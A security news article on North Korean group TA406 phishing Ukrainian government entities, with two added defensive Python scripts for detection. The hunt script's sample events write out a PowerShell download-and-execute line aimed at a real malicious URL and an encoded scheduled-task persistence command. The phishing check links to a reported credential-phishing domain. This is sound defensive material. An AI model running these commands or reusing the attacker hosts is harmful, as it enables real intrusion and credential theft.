SecurityBrief Asia - Technology news for CISOs & cybersecurity decision-makers
North Korean hackers step up phishing attacks on Ukraine government

Proofpoint has published new threat intelligence regarding TA406, a Democratic People's Republic of Korea (DPRK) state-sponsored cyber actor that has begun targeting Ukrainian government bodies.

TA406, identified by other firms as Opal Sleet and Konni, shifted its focus in February 2025 to Ukrainian entities with phishing attacks containing both credential-stealing and malware components.

According to Proofpoint, these operations appear designed to collect strategic intelligence concerning the ongoing Russian invasion of Ukraine, with the likely intention of informing North Korean leadership about the conflict and risks to its personnel.

"In February 2025, TA406 began targeting government entities in Ukraine, delivering both credential harvesting and malware in its phishing campaigns. The aim of these campaigns is likely to collect intelligence on the trajectory of the Russian invasion," stated the research.

The group's tactics in recent campaigns included sending emails that posed as staff from think tanks, with the content tailored to recent developments in Ukrainian politics to entice engagement. Emails were found to have impersonated a fictitious senior fellow from a non-existent organisation, the Royal Institute of Strategic Studies.

Recipients were asked to download reports via links to external file hosting services. These links provided access to password-protected archives containing malicious files, including HTML and CHM files with embedded PowerShell scripts. Once executed, these scripts carried out extensive reconnaissance on the targeted system.

Describing the infection chain from one such campaign, Proofpoint stated: "The file Analytical Report.rar drops a CHM file of the same name when decrypted. The CHM file contains multiple HTML files that display lure content related to former Ukrainian military leader Valeriy Zaluzhnyi. PowerShell in the HTML executes if a user clicks within the page; this initiates a GET request to hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt to download further PowerShell and execute it."

The subsequent PowerShell scripts collected a variety of system information, such as network configuration and details of installed antivirus software. The data was then Base64 encoded and transmitted via a POST request to a command-and-control server controlled by TA406.

"The PowerShell then uses similar scripting logic from the initial HTML file and saves it to a file named state.bat in the host's APPDATA folder. The batch file is then installed as an autorun file for persistence and runs upon machine start up," Proofpoint reported.

TA406 also used alternative forms of malware delivery. In some cases, the first-stage payload was delivered as an HTML attachment. When the recipient followed the embedded link, a ZIP archive was downloaded, containing both a benign PDF and a malicious LNK shortcut file. Proofpoint described: "The decoded LNK command contains further Base64-encoded PowerShell, which initiates a scheduled task named Windows Themes Update." This process dropped a JScript Encoded (.jse) file that was run by the scheduled task, checking in with a TA406-controlled server for further instructions.
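For defenders, both delivery chains described above leave host-side traces that are straightforward to hunt for: the CHM viewer (hh.exe) spawning PowerShell, an autorun entry pointing at a script under APPDATA, and an LNK-launched PowerShell -EncodedCommand that registers a scheduled task. The script below is an added example written for this page, not code from Proofpoint's report or from TA406's tooling. It runs three rules over constructed Sysmon-style events; the field names, the Run-key location (the article only says "autorun"), the wscript/.jse task command line and the host names are assumptions modelled on the description above, while the task name, the state.bat filename and the test.txt URL come from the report.

```python
"""Hunt rules for the two TA406 delivery chains described in the article,
run over constructed Sysmon-style events (assumed field names, not real
telemetry). Added example, not Proofpoint's code."""
import base64
import re

# Constructed: a plausible payload for the LNK's Base64 PowerShell. The task
# name is the one Proofpoint reports; the wscript/.jse command is an assumption.
LNK_PAYLOAD = ('schtasks /Create /TN "Windows Themes Update" '
               '/TR "wscript.exe %APPDATA%\\theme.jse" /SC MINUTE /MO 5 /F')
# PowerShell's -EncodedCommand expects Base64 of UTF-16LE text.
ENCODED_PAYLOAD = base64.b64encode(LNK_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # CHM chain: hh.exe renders the CHM, the embedded script launches PowerShell
    # which fetches the next stage (URL shown un-defanged as telemetry would).
    {"event": "ProcessCreate", "host": "ws01",
     "parent_image": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://pokijhgcfsdfghnj.mywebcommunity.org/main/test.txt')\""},
    # CHM chain persistence: autorun entry for state.bat under APPDATA
    # (a Run key is assumed here).
    {"event": "RegistryValueSet", "host": "ws01",
     "target_object": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "details": r"C:\Users\analyst\AppData\Roaming\state.bat"},
    # LNK chain: the shortcut runs PowerShell with an encoded command.
    {"event": "ProcessCreate", "host": "ws02",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_PAYLOAD}"},
    # Benign control: must produce no finding.
    {"event": "ProcessCreate", "host": "ws03",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\analyst\report.docx"'},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\|%APPDATA%|\\Temp\\|\\Users\\Public\\", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common ones are listed.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_chm_spawns_script_host(ev):
    """CHM viewer launching a script interpreter (the CHM/HTML stage)."""
    if ev.get("event") != "ProcessCreate":
        return None
    if basename(ev.get("parent_image", "")) == "hh.exe" and basename(ev.get("image", "")) in SCRIPT_HOSTS:
        return "hh.exe (CHM viewer) spawned " + basename(ev["image"])
    return None


def rule_run_key_to_user_writable(ev):
    """Autorun entry whose target lives in a user-writable location (state.bat under APPDATA)."""
    if ev.get("event") != "RegistryValueSet":
        return None
    if RUN_KEY.search(ev.get("target_object", "")) and USER_WRITABLE.search(ev.get("details", "")):
        return "Run key points into user-writable path: " + ev["details"]
    return None


def rule_encoded_schtasks(ev):
    """Encoded PowerShell that registers a scheduled task (the LNK stage)."""
    if ev.get("event") != "ProcessCreate":
        return None
    decoded = decode_encoded_command(ev.get("command_line", ""))
    if decoded and re.search(r"schtasks(?:\.exe)?\s+/create", decoded, re.I):
        name = re.search(r'/TN\s+"?([^"/]+)"?', decoded, re.I)
        task = name.group(1).strip() if name else "<unknown>"
        return f"Encoded PowerShell creates scheduled task '{task}'"
    return None


RULES = (rule_chm_spawns_script_host, rule_run_key_to_user_writable, rule_encoded_schtasks)


def hunt(events):
    """Apply every rule to every event; return (host, rule name, detail) per hit."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((ev.get("host", "?"), rule.__name__, hit))
    return findings


if __name__ == "__main__":
    for host, rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{host}: [{rule}] {detail}")
```

Decoding the -EncodedCommand argument as UTF-16LE Base64 is what makes the scheduled-task name visible to the rule; matching on the encoded string itself would miss any payload that is re-encoded, so the decode step belongs in the detection rather than in an analyst's later triage.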

Prior to these malware campaigns, Proofpoint documented credential harvesting efforts by TA406. The group sent fake Microsoft security alerts to Ukrainian government addresses from Proton Mail accounts, tricking recipients into visiting malicious websites where login credentials could be stolen.

Proofpoint noted: "Prior to TA406's malware delivery campaigns, Proofpoint also observed TA406 attempt to gather credentials by sending fake Microsoft security alert messages to Ukrainian government entities from Proton Mail accounts. The messages claim the target's account had unusual sign-in activity from various IP addresses, and request the target verify the login attempt via a link to the compromised domain jetmf[.]com." The same domain had previously been used for credential phishing against Naver accounts in past TA406 campaigns.
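The lure described above is a plain brand-impersonation pattern: a display name and subject that claim Microsoft, a sender address at a free webmail provider, and a "verify your sign-in" link that leads to a domain Microsoft does not own. The following Python triage check is an added example written for this page, not code from Proofpoint or from the article. The two messages are constructed (only the jetmf[.]com domain is taken from the report, shown un-defanged as it would appear in a message), and the allowlist of Microsoft sending and link domains is an illustrative assumption that a real deployment would replace with a vetted list.

```python
"""Triage check for Microsoft-themed credential lures of the kind described in
the article. Added example, not Proofpoint's code. Sample messages are
constructed; the domain lists below are illustrative assumptions."""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Assumption: domains Microsoft legitimately mails from and links to for account alerts.
MICROSOFT_DOMAINS = ("microsoft.com", "live.com", "microsoftonline.com", "office.com")
# Assumption: free webmail providers a Microsoft security alert would never originate from.
FREE_WEBMAIL = ("proton.me", "protonmail.com", "pm.me", "gmail.com")

# Constructed lure modelled on the report: Microsoft branding, Proton Mail sender,
# "unusual sign-in" pretext, verify link to the report's jetmf[.]com domain.
PHISH = """From: Microsoft account team <security-alerts@proton.me>
To: user@ministry.example
Subject: Microsoft account unusual sign-in activity
Content-Type: text/html; charset=utf-8

<html><body><p>We detected unusual sign-in activity from several IP addresses.</p>
<p><a href="http://jetmf.com/verify">Review recent activity</a></p></body></html>
"""

# Constructed control: same pretext, but sender and link are on Microsoft domains.
LEGIT = """From: Microsoft account team <account-security-noreply@accountprotection.microsoft.com>
To: user@example.com
Subject: Microsoft account unusual sign-in activity
Content-Type: text/html; charset=utf-8

<html><body><p><a href="https://account.live.com/Activity">Review recent activity</a></p></body></html>
"""


def _in_domains(host, domains):
    """True if host equals one of the domains or is a subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def _urls(msg):
    """Pull every http(s) URL out of the preferred (html, then plain) body part."""
    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body is not None else ""
    return re.findall(r"""https?://[^\s"'<>]+""", text)


def assess(raw):
    """Return a list of reasons the message looks like a Microsoft-impersonating lure.
    An empty list means no impersonation signal was found."""
    msg = message_from_string(raw, policy=policy.default)
    display_name, addr = parseaddr(str(msg["From"] or ""))
    sender_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    claims_microsoft = "microsoft" in f"{display_name} {msg['Subject'] or ''}".lower()
    reasons = []
    if not claims_microsoft:
        return reasons
    if not _in_domains(sender_domain, MICROSOFT_DOMAINS):
        reasons.append(f"claims Microsoft but sent from {sender_domain}")
        if _in_domains(sender_domain, FREE_WEBMAIL):
            reasons.append("sender is a free webmail account")
    for url in _urls(msg):
        host = urlparse(url).hostname
        if not _in_domains(host, MICROSOFT_DOMAINS):
            reasons.append(f"action link leads off-brand to {host}")
    return reasons


if __name__ == "__main__":
    for label, sample in (("PHISH", PHISH), ("LEGIT", LEGIT)):
        print(label, assess(sample) or ["no impersonation signals"])
```

The check deliberately keys on the brand claim first: a Proton Mail sender or an unfamiliar link is unremarkable on its own, but either one combined with Microsoft branding in the From name or subject is the combination this campaign relied on.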

Proofpoint could not attribute every observed operation to TA406 with full certainty. However, overlapping infrastructure and tooling, together with consistent victimology, link the activity to the group's long-standing focus on strategic, political intelligence collection rather than the tactical battlefield data that Russian threat actors typically pursue.

"Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict. North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments. Unlike Russian groups who have likely been tasked with gathering tactical battlefield information and targeting of Ukrainian forces in situ, TA406 has typically focused on more strategic, political intelligence collection efforts," the research concluded.
